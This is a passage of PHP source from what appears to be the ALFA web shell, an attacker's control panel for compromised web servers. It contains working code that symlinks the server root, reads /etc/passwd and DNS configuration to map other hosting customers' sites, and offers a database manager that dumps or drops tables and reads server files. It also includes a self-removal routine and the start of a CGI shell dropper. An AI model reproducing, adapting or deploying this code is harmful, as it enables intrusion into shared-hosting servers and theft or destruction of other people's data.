  4651. if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
  4652. @mkdir('alfasymlink',0777);
  4653. alfacgihtaccess('sym','alfasymlink/');
  4654. _alfa_symlink('/','alfasymlink/root');
  4655. $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
  4656. if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
  4657. echo "<center>";
  4658. $lines = array();
  4659. $anony_domains = array();
  4660. $anonymous_users = array();
  4661. $f_black = array();
  4662. $error = false;
  4663. $anonymous = false;
  4664. $makepwd = "/home/{user}/public_html/";
  4665. $domains = alfaGetDomains();
  4666. $lines = $domains["lines"];
  4667. $state = $domains["state"];
  4668. $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
  4669. $can_runcmd = _alfa_can_runCommand(false,false);
  4670. if(!$is_posix && !$can_runcmd){
  4671. $anonymous = true;
  4672. $anony_domains = $domains["lines"];
  4673. $lines = _alfa_file('/etc/passwd');
  4674. }
  4675. echo $table_header;
  4676. $count=1;
  4677. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4678. foreach($lines as $line){
  4679. $domain = "";
  4680. $owner = "";
  4681. if($anonymous){
  4682. $explode = explode(":", $line);
  4683. $owner = $explode[0];
  4684. $owner_len = strlen($owner) - 1;
  4685. $userid = $explode[2];
  4686. if((int)$userid < 500)continue;
  4687. $domain = "[?????]";
  4688. $temp_black = array();
  4689. $finded = false;
  4690. foreach($anony_domains as $anony){
  4691. if($state == "named.conf"){
  4692. if(@strstr($anony, 'zone')){
  4693. preg_match_all('#zone "(.*)"#',$anony, $data);
  4694. $domain = $data[1][0];
  4695. }else{
  4696. continue;
  4697. }
  4698. }elseif($state == "named" || $state == "valiases"){
  4699. if($anony == "." || $anony == "..")continue;
  4700. if($state == "named")$anony = rtrim($anony, ".db");
  4701. $domain = $anony;
  4702. }
  4703. $sub_domain = str_replace(array("-","."), "", $domain);
  4704. if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
  4705. if(in_array($owner.$domain, $temp_black))continue;
  4706. $sympath = str_replace("{user}", $owner, $makepwd);
  4707. $http = "http://".$domain;
  4708. echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4709. $count++;
  4710. $temp_black[] = $owner.$domain;
  4711. $finded = true;
  4712. }
  4713. }
  4714. if(!$finded){
  4715. $anonymous_users[] = $owner;
  4716. }
  4717. }else{
  4718. if($state == "named.conf"){
  4719. if(@strstr($line, 'zone')){
  4720. preg_match_all('#zone "(.*)"#',$line, $data);
  4721. $domain = $data[1][0];
  4722. }else{
  4723. continue;
  4724. }
  4725. }elseif($state == "named" || $state == "valiases"){
  4726. if($line == "." || $line == "..")continue;
  4727. if($state == "named")$line = rtrim($line, ".db");
  4728. $domain = $line;
  4729. }
  4730. if(strlen(trim($domain)) > 2 && $state != "passwd"){
  4731. if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
  4732. if($is_posix){
  4733. $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
  4734. $owner = $user["name"];
  4735. }elseif($can_runcmd){
  4736. $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
  4737. }
  4738. }
  4739. }
  4740. if(!$anonymous){
  4741. if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
  4742. $sympath = str_replace("{user}", $owner, $makepwd);
  4743. $http = "http://".$domain;
  4744. if($state == "passwd"){
  4745. $http = "javascript:alert('we cant find domain...')";
  4746. }
  4747. echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
  4748. $count++;
  4749. $f_black[] = $owner.$domain;
  4750. }
  4751. }
  4752. if($anonymous){
  4753. foreach($anonymous_users as $owner){
  4754. $sympath = str_replace("{user}", $owner, $makepwd);
  4755. $http = "javascript:alert('we cant find domain...')";
  4756. echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
  4757. $count++;
  4758. }
  4759. }
  4760. $cant_symlink = false;
  4761. }else{
  4762. $is_direct = false;
  4763. $makepwd = alfaMakePwd();
  4764. if(_alfa_file_exists("/etc/virtual/domainowners")){
  4765. $makepwd = "/home/{user}/public_html";
  4766. $is_direct = true;
  4767. }
  4768. $sole = _alfa_file("/etc/virtual/domainowners");
  4769. $count=1;
  4770. echo $table_header;
  4771. $template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
  4772. if($sole){
  4773. foreach($sole as $visible){
  4774. if(@strstr($visible,":")){
  4775. $solevisible = explode(':', $visible);
  4776. $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
  4777. echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
  4778. }
  4779. }
  4780. }else{
  4781. $passwd = _alfa_file("/etc/passwd");
  4782. if($passwd){
  4783. $html = "";
  4784. $is_named = false;
  4785. $users = array();
  4786. $domains = array();
  4787. $uknowns = array();
  4788. foreach($passwd as $user){
  4789. $user = trim($user);
  4790. $expl = explode(":", $user);
  4791. if((int)$expl[2] < 500)continue;
  4792. $users[$expl[0]] = $expl[5];
  4793. }
  4794. $site_domains = @scandir("/etc/virtual/");
  4795. if(!$site_domains){
  4796. $site_domains = alfaEx("ls /etc/virtual/");
  4797. $site_domains = explode("\n", $site_domains);
  4798. if(!$site_domains){
  4799. $site_domains = _alfa_file("/etc/named.conf");
  4800. if($site_domains){$is_named = true;}
  4801. }
  4802. }
  4803. foreach($site_domains as $line){
  4804. if($is_named){
  4805. if(@strstr($line, 'zone')){
  4806. preg_match_all('#zone "(.*)"#',$line, $data);
  4807. $domain = $data[1][0];
  4808. if(strlen($domain > 2) && !empty($domain)){
  4809. $domains[] = $domain;
  4810. }
  4811. }
  4812. }else{
  4813. $domains[] = $line;
  4814. }
  4815. }
  4816. $x = 1;
  4817. foreach($users as $user => $home){
  4818. foreach($domains as $domain){
  4819. $user_len = strlen($user) - 1;
  4820. $sub_domain = str_replace(array("-","."), "", $domain);
  4821. $five_user = substr($user, 0,$user_len);
  4822. $five_domain = substr($sub_domain, 0,$user_len);
  4823. if($five_user == $five_domain){
  4824. if($is_direct){
  4825. $cwd = str_replace("{user}", $user, $makepwd);
  4826. }else{
  4827. $expl = explode("}/", $makepwd);
  4828. $cwd = $home."/".$expl[1];
  4829. }
  4830. $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
  4831. }else{
  4832. $uknowns[$user] = $home;
  4833. }
  4834. }
  4835. }
  4836. $uknowns = array_unique($uknowns);
  4837. foreach($uknowns as $user => $home){
  4838. if($is_direct){
  4839. $cwd = str_replace("{user}", $user, $makepwd);
  4840. }else{
  4841. $expl = explode("}/", $makepwd);
  4842. $cwd = $home."/".$expl[1];
  4843. }
  4844. $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
  4845. }
  4846. echo($html);
  4847. }
  4848. }
  4849. echo "</table>";
  4850. $cant_symlink = false;
  4851. }
  4852. }else{
  4853. echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
  4854. $cant_symlink = false;
  4855. }
  4856. if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
  4857. echo "</center></table>";
  4858. }
  4859. echo "</div>";
  4860. alfafooter();
  4861. }
  4862. function alfasql(){
  4863. if(!isset($_POST['sql_host'])){
  4864. $_POST['sql_host'] = $_SESSION["sql_host"];
  4865. $_POST['sql_login'] = $_SESSION["sql_login"];
  4866. $_POST['sql_pass'] = $_SESSION["sql_pass"];
  4867. $_POST['sql_base'] = $_SESSION["sql_base"];
  4868. }
  4869. class DbClass{
  4870. public $type;
  4871. public $link;
  4872. public $res;
  4873. function __construct($type){
  4874. $this->type = $type;
  4875. }
  4876. function connect($host, $user, $pass, $dbname){
  4877. switch($this->type){
  4878. case 'mysql':
  4879. if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
  4880. break;
  4881. case 'pgsql':
  4882. $host = explode(':', $host);
  4883. if(!$host[1]) $host[1]=5432;
  4884. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  4885. break;
  4886. }
  4887. return false;
  4888. }
  4889. function selectdb($db){
  4890. switch($this->type){
  4891. case 'mysql':
  4892. if(@mysqli_select_db($db))return true;
  4893. break;
  4894. }
  4895. return false;
  4896. }
  4897. function query($str){
  4898. switch($this->type){
  4899. case 'mysql':
  4900. return $this->res = @mysqli_query($this->link,$str);
  4901. break;
  4902. case 'pgsql':
  4903. return $this->res = @pg_query($this->link,$str);
  4904. break;
  4905. }
  4906. return false;
  4907. }
  4908. function fetch(){
  4909. $res = func_num_args()?func_get_arg(0):$this->res;
  4910. switch($this->type){
  4911. case 'mysql':
  4912. return @mysqli_fetch_assoc($res);
  4913. break;
  4914. case 'pgsql':
  4915. return @pg_fetch_assoc($res);
  4916. break;
  4917. }
  4918. return false;
  4919. }
  4920. function listDbs(){
  4921. switch($this->type){
  4922. case 'mysql':
  4923. return $this->query("SHOW databases");
  4924. break;
  4925. case 'pgsql':
  4926. return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
  4927. break;
  4928. }
  4929. return false;
  4930. }
  4931. function listTables(){
  4932. switch($this->type){
  4933. case 'mysql':
  4934. return $this->res = $this->query('SHOW TABLES');
  4935. break;
  4936. case 'pgsql':
  4937. return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
  4938. break;
  4939. }
  4940. return false;
  4941. }
  4942. function error(){
  4943. switch($this->type){
  4944. case 'mysql':
  4945. return @mysqli_error($this->link);
  4946. break;
  4947. case 'pgsql':
  4948. return @pg_last_error();
  4949. break;
  4950. }
  4951. return false;
  4952. }
  4953. function setCharset($str){
  4954. switch($this->type){
  4955. case 'mysql':
  4956. if(function_exists('mysql_set_charset'))
  4957. return @mysqli_set_charset($this->link,$str);
  4958. else
  4959. $this->query('SET CHARSET '.$str);
  4960. break;
  4961. case 'pgsql':
  4962. return @pg_set_client_encoding($this->link, $str);
  4963. break;
  4964. }
  4965. return false;
  4966. }
  4967. function loadFile($str){
  4968. switch($this->type){
  4969. case 'mysql':
  4970. return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
  4971. break;
  4972. case 'pgsql':
  4973. $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
  4974. $r=array();
  4975. while($i=$this->fetch())
  4976. $r[] = $i['file'];
  4977. $this->query('droptable solevisible');return array('file'=>implode("\n",$r));
  4978. break;}
  4979. return false;
  4980. }
  4981. function dump($table, $fp = false){
  4982. switch($this->type){
  4983. case 'mysql':
  4984. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  4985. $create = mysqli_fetch_array($res);
  4986. $sql = $create[1].";\n";
  4987. if($fp) fwrite($fp, $sql); else echo($sql);
  4988. $this->query('SELECT * FROM `'.$table.'`');
  4989. $head = true;
  4990. while($item = $this->fetch()){
  4991. $columns = array();
  4992. foreach($item as $k=>$v) {
  4993. if($v == null)
  4994. $item[$k] = "''";
  4995. elseif(is_numeric($v))
  4996. $item[$k] = $v;
  4997. else
  4998. $item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
  4999. $columns[] = "`".$k."`";
  5000. }
  5001. if($head) {
  5002. $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
  5003. $head = false;
  5004. } else
  5005. $sql = "\n\t,(".implode(", ", $item).')';
  5006. if($fp) fwrite($fp, $sql); else echo($sql);
  5007. }
  5008. if(!$head)
  5009. if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
  5010. break;
  5011. case 'pgsql':
  5012. $this->query('SELECT * FROM '.$table);
  5013. while($item = $this->fetch()) {
  5014. $columns = array();
  5015. foreach($item as $k=>$v) {
  5016. $item[$k] = "'".addslashes($v)."'";
  5017. $columns[] = $k;
  5018. }
  5019. $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  5020. if($fp) fwrite($fp, $sql); else echo($sql);
  5021. }
  5022. break;
  5023. }
  5024. return false;
  5025. }
  5026. };
  5027. $db = new DbClass($_POST['type']);
  5028. if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
  5029. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  5030. $db->selectdb($_POST['sql_base']);
  5031. switch($_POST['charset']){
  5032. case "Windows-1251": $db->setCharset('calfa1251'); break;
  5033. case "UTF-8": $db->setCharset('utf8'); break;
  5034. case "KOI8-R": $db->setCharset('koi8r'); break;
  5035. case "KOI8-U": $db->setCharset('koi8u'); break;
  5036. case "calfa866": $db->setCharset('calfa866'); break;
  5037. }
  5038. $json = json_decode($_POST['alfa2'],true);
  5039. if(count($json['tbl'])>0){
  5040. if($_POST['alfa1']=='dumpfile'){
  5041. if($fp = @fopen($json['file'],'w')){
  5042. foreach($json['tbl'] as $v)$db->dump($v, $fp);
  5043. fclose($fp);
  5044. $dumpStatus = true;
  5045. }}else{
  5046. foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
  5047. }
  5048. }
  5049. unset($_POST['alfa2']);
  5050. }
  5051. alfahead();
  5052. echo "
  5053. <div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
  5054. <form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
  5055. <td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
  5056. <input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
  5057. <td><select name='type'><option value='mysql' ";
  5058. if(@$_POST['type']=='mysql')echo 'selected';
  5059. echo ">MySql</option><option value='pgsql' ";
  5060. if(@$_POST['type']=='pgsql')echo 'selected';
  5061. echo ">PostgreSql</option></select></td>
  5062. <td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
  5063. <td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
  5064. <td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
  5065. $tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
  5066. if(isset($_POST['sql_host'])){
  5067. if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  5068. $_SESSION["sql_host"] = $_POST['sql_host'];
  5069. $_SESSION["sql_login"] = $_POST['sql_login'];
  5070. $_SESSION["sql_pass"] = $_POST['sql_pass'];
  5071. $_SESSION["sql_base"] = $_POST['sql_base'];
  5072. switch($_POST['charset']){
  5073. case "Windows-1251": $db->setCharset('calfa1251'); break;
  5074. case "UTF-8": $db->setCharset('utf8'); break;
  5075. case "KOI8-R": $db->setCharset('koi8r'); break;
  5076. case "KOI8-U": $db->setCharset('koi8u'); break;
  5077. case "calfa866": $db->setCharset('calfa866'); break;
  5078. }
  5079. $db->setCharset('utf8');
  5080. $db->listDbs();
  5081. echo "<select name=sql_base><option value=''></option>";
  5082. while($item = $db->fetch()) {
  5083. list($key, $value) = each($item);
  5084. echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  5085. }
  5086. echo '</select>';
  5087. }
  5088. else echo $tmp;
  5089. }else
  5090. echo $tmp;
  5091. echo "</td>
  5092. <td><input type='submit' value=' '></td>
  5093. <td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>
  5094. </tr>
  5095. </table>
  5096. <script>mysql_cache['host']='".addslashes($_POST['sql_host'])."';mysql_cache['user']='".addslashes($_POST['sql_login'])."';mysql_cache['pass']='".addslashes($_POST['sql_pass'])."';mysql_cache['db']='".addslashes($_POST['sql_base'])."';mysql_cache['charset']='".addslashes($_POST['charset'])."';mysql_cache['type']='".addslashes($_POST['type'])."';mysql_cache['count']='".addslashes($_POST['sql_count'])."'</script>
  5097. ";
  5098. if(isset($db) && $db->link){
  5099. echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  5100. if(!empty($_POST['sql_base'])){
  5101. $db->selectdb($_POST['sql_base']);
  5102. echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
  5103. $tbls_res = $db->listTables();
  5104. while($item = $db->fetch($tbls_res)){
  5105. list($key, $value) = each($item);
  5106. if(!empty($_POST['sql_count']))
  5107. $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`'));
  5108. $value = htmlspecialchars($value);
  5109. echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href='javascript:void(0);' onclick=\"fs('0','".$value."')\"><span class='mysql_tables' style='font-weight:unset;'>".$value."</span></a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
  5110. }
  5111. echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>".($dumpStatus?'<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>':'')."</td><td style='border-top:2px solid #666;'>";
  5112. if(@$_POST['alfa1'] == 'select'){
  5113. $_POST['alfa1'] = 'query';
  5114. $_POST['alfa3'] = $_POST['alfa3']?$_POST['alfa3']:1;
  5115. $db->query('SELECT COUNT(*) as n FROM `'.$_POST['alfa2'].'`');
  5116. $num = $db->fetch();
  5117. $pages = ceil($num['n'] / 30);
  5118. echo "<span>".$_POST['alfa2']."</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
  5119. echo " of $pages";
  5120. if($_POST['alfa3'] > 1)
  5121. echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']-1)."\"]')>&lt; Prev</a>";
  5122. if($_POST['alfa3'] < $pages)
  5123. echo " <a href='javascript:void(0);' onclick=fs('1','[\"".$_POST['alfa2']."\",\"".($_POST['alfa3']+1)."\"]')>Next &gt;</a>";
  5124. $_POST['alfa3']--;
  5125. $cache_table = $_POST['alfa2'];
  5126. if($_POST['type']=='pgsql')
  5127. $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT 30 OFFSET '.($_POST['alfa3']*30);
  5128. else
  5129. $_POST['alfa2'] = 'SELECT * FROM `'.$_POST['alfa2'].'` LIMIT '.($_POST['alfa3']*30).',30';
  5130. echo "<br><br>";
  5131. }
  5132. if((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2'])) {
  5133. $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($_POST['sql_base'])."' AND TABLE_NAME = '".@addslashes($cache_table)."' AND COLUMN_KEY = 'PRI'"));
  5134. $db->query(@$_POST['alfa2']);
  5135. if($db->res !== false){
  5136. $title = false;
  5137. echo '<table width="100%" cellspacing="1" cellpadding="2" class="main"style="background-color:#292929" border="1">';
  5138. $line = 1;
  5139. while($item = $db->fetch()) {
  5140. if(!$title){
  5141. echo '<tr><th>#</th>';
  5142. foreach($item as $key => $value){
  5143. echo '<th>'.$key.'</th>';
  5144. }
  5145. reset($item);
  5146. $title=true;
  5147. echo '</tr><tr>';
  5148. $line = 2;
  5149. }
  5150. if($cache_table!=''){
  5151. $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["'.$cache_table.'","'.(!$prikey['COLUMN_NAME']?0:$prikey['COLUMN_NAME']).'","'.__ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME']?$item:$item[$prikey['COLUMN_NAME']]))).'"]\')>Edit</a>';
  5152. }else{
  5153. $cacheMsg ='-';
  5154. }
  5155. echo '<tr class="l'.$line.'"><td>'.$cacheMsg.'</td>';
  5156. $line = $line==1?2:1;
  5157. foreach($item as $key => $value){
  5158. if($value == null)
  5159. echo '<td><i>null</i></td>';
  5160. else
  5161. echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  5162. }
  5163. echo '</tr>';
  5164. }
  5165. echo '</table>';
  5166. } else {
  5167. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  5168. }
  5169. }
  5170. echo('</form>');
  5171. if((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])){
  5172. $data = explode(':',$_POST['alfa3']);
  5173. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data[0].'</font></p>');
  5174. echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
  5175. if($data[1] != '0'){
  5176. $data[2] = __ZGVjb2Rlcg($data[2]);
  5177. $data[2] = str_replace('"','',$data[2]);
  5178. $fetch = $db->fetch($db->query("SELECT * FROM `".$data[0]."` WHERE `".$data[1]."` = '".$data[2]."'"));
  5179. $fetch['__ALFAKEY'] = $data[1];
  5180. $fetch['__ALFAKEYVAL'] = $data[2];
  5181. }else{
  5182. $d = __ZGVjb2Rlcg($data[2]);
  5183. $fetch = json_decode($d, true);
  5184. }
  5185. foreach($fetch as $key => $value){
  5186. if($key=='__ALFAKEY'||$key=='__ALFAKEYVAL')continue;
  5187. $value = htmlspecialchars($value);
  5188. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
  5189. }
  5190. echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode(($data[1] != '0'?array('__ALFAKEY'=>$data[1],'__ALFAKEYVAL'=>$data[2]):$fetch)))."'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
  5191. }
  5192. if((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])){
  5193. $data = json_decode($_POST['alfa2'], true);
  5194. $alfadata = $data['__ALFADATA'];
  5195. $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
  5196. $keyval = array();
  5197. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">'.$data['__ALFATBL'].'</font></p>');
  5198. echo("<form onsubmit='fsu(this);return false;'><table border='1'>");
  5199. $set = '';
  5200. foreach($data as $key => $value){
  5201. if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
  5202. if($data2['__ALFAKEY']==$key){
  5203. $keyval['__ALFAKEY'] = $key;
  5204. $keyval['__ALFAKEYVAL'] = $value;
  5205. }
  5206. $set .= "`$key` = '".addslashes($value)."',";
  5207. $value = htmlspecialchars($value);
  5208. echo("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
  5209. }
  5210. unset($data['__ALFADATA']);
  5211. echo("</table><input type='hidden' name='__ALFADATA' value='".__ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY'])?array('__ALFAKEY'=>$keyval['__ALFAKEY'],'__ALFAKEYVAL'=>$keyval['__ALFAKEYVAL']):$data)))."'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
  5212. if(!isset($data2['__ALFAKEY'])){
  5213. $where = '';
  5214. foreach($data2 as $key => $value){
  5215. if($key=='__ALFATBL'||$key=='__ALFADATA')continue;
  5216. $value = addslashes($value);
  5217. $where .= "`$key` = '$value' AND ";
  5218. }
  5219. $where = substr($where, 0, -4);
  5220. }else{
  5221. $where = "`{$data2['__ALFAKEY']}` = '".addslashes($data2['__ALFAKEYVAL'])."'";
  5222. }
  5223. $set = substr($set, 0, -1);
  5224. $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
  5225. if($db->error())
  5226. echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  5227. else echo("Success...!");
  5228. }
  5229. if($_POST['alfa1']!='edit'&&$_POST['alfa1']!='update'){
  5230. echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
  5231. <input type='hidden' name='alfa1' value='query'/>
  5232. <textarea name='query' style='width:100%;height:100px'>";
  5233. echo $_POST['alfa1']!='loadfile'?htmlspecialchars($_POST['alfa2']):'';
  5234. echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
  5235. }
  5236. echo "</td></tr>";
  5237. }
  5238. echo "</table></form><br/>";
  5239. if($_POST['type']=='mysql') {
  5240. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
  5241. if($db->fetch())
  5242. echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
  5243. }
  5244. if(@$_POST['alfa1'] == 'loadfile'){
  5245. $file = $db->loadFile($_POST['alfa2']);
  5246. echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  5247. }
  5248. }else{
  5249. echo htmlspecialchars($db->error());
  5250. }
  5251. echo '</div>';
  5252. alfafooter();
  5253. }
  5254. function alfaselfrm(){
  5255. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
  5256. echo(__pre().'<center>');
  5257. if(@unlink($GLOBALS['__file_path'])){
  5258. echo('<b>Shell has been removed</i> :)</b>');
  5259. }else{
  5260. echo 'unlink error!';
  5261. }
  5262. echo('</center>');
  5263. }
  5264. if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
  5265. echo "<div class=header>";
  5266. echo "
  5267. <center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
  5268. echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
  5269. echo '</p></center></div>';
  5270. }
  5271. }
  5272. function alfacgishell(){
  5273. alfahead();
  5274. $div = "";
  5275. if(!in_array($_POST['alfa1'],array('perl','py'))){
  5276. $div = "</div>";
  5277. echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
  5278. }
  5279. if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
  5280. @mkdir('cgialfa',0755);
  5281. @chdir('cgialfa');
  5282. alfacgihtaccess('cgi');
  5283. $name = $_POST['alfa1'].'.alfa';
